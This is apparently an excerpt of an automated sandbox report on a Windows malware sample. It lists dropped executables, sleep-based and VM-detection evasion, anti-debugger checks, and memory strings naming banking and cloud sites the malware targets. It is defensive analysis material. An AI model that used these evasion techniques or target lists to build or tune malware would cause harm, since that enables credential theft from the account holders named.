Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062126001\a6c5834e2f.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-B6V2L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-F3L00.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-SOSP7.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062127001\62950fb3a8.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-2RO6E.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-CAFKN.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5Concurrent.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libEGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062130001\072d564b60.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7NP9I.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\is-0DEO7.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-PJU74.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-LC5T3.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-S5638.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exe
Source: C:\Users\user\Desktop\AApUa7VQiy.exe TID: 7660 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1440 | Thread sleep count: 407 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1440 | Thread sleep time: -814407s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3568 | Thread sleep count: 415 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3568 | Thread sleep time: -830415s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604 | Thread sleep count: 223 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604 | Thread sleep time: -6690000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736 | Thread sleep count: 366 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 736 | Thread sleep time: -732366s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1656 | Thread sleep count: 343 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1656 | Thread sleep time: -686343s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3412 | Thread sleep count: 322 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3412 | Thread sleep time: -644322s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208 | Thread sleep count: 419 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3208 | Thread sleep time: -838419s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5508 | Thread sleep count: 402 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5508 | Thread sleep time: -804402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1280 | Thread sleep count: 382 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1280 | Thread sleep time: -764382s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 604 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe TID: 2960 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe TID: 6068 | Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe TID: 6828 | Thread sleep time: -210000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe TID: 7928 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 | Thread sleep count: 7010 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 | Thread sleep count: 115 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com TID: 7540 | Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | Thread delayed: delay time: 60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\36469\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\36469
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmp, BEB973FPO2R62ZWABVOVP8TC.exe, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1547870814.0000000000CF2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, skotes.exe, 00000007.00000002.1587693353.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000001.1526550534.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000008.00000002.1595406472.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.2748456871.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000001.1716865425.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmp, df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000003.1520358356.000000000143F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696503903o
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: ktIplF5.exe, 0000000F.00000002.2108033300.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, ktIplF5.exe, 0000000F.00000003.2091707440.00000000011BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: AApUa7VQiy.exe, AApUa7VQiy.exe, 00000000.00000003.1327618460.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1462219530.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1383159698.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372532906.0000000001458000.00000004.00000020.00020000.00000000.sdmp, AApUa7VQiy.exe, 00000000.00000003.1372723744.0000000001458000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.0000000001083000.00000004.00000020.00020000.00000000.sdmp, ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.000000000149A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.2765037077.0000000001468000.00000004.00000020.00020000.00000000.sdmp, flv2aviconverter24.exe, 0000000C.00000002.2754377990.00000000007B8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696503903
Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: Avoiding.com, 0000001C.00000002.2769015216.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 00000033.00000002.2765461914.0000000001001000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: NVMware2
Source: f46bdbcca4.tmp, 00000020.00000002.2060833534.0000000000597000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000003.1520358356.000000000143F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000025.00000002.2251703532.0000018C03129000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696503903t
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696503903s
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1536146790.000000000103E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe, 00000003.00000002.1533901037.0000000000A69000.00000040.00000001.01000000.00000006.sdmp, BEB973FPO2R62ZWABVOVP8TC.exe, 00000006.00000002.1547870814.0000000000CF2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000007.00000002.1587693353.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000001.1526550534.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, skotes.exe, 00000008.00000002.1595406472.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.2748456871.0000000000212000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000001.1716865425.0000000000212000.00000080.00000001.01000000.0000000A.sdmp, ktIplF5.exe, 0000000F.00000002.2103984624.0000000000A17000.00000040.00000001.01000000.00000011.sdmp, df1b740bf8.exe, 0000001E.00000002.2059698305.0000000000417000.00000040.00000001.01000000.00000015.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696503903j
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696503903f
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AF5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: ktIplF5.exe, 0000000F.00000003.1940224110.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696503903p
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Process information queried: ProcessInformation

                            Anti Debugging

Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\AApUa7VQiy.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Code function: 6_2_053E0123 rdtsc | 6_2_053E0123
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Code function: 6_2_00B3652B mov eax, dword ptr fs:[00000030h] | 6_2_00B3652B
Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Code function: 6_2_00B3A302 mov eax, dword ptr fs:[00000030h] | 6_2_00B3A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 7_2_0005A302 mov eax, dword ptr fs:[00000030h] | 7_2_0005A302
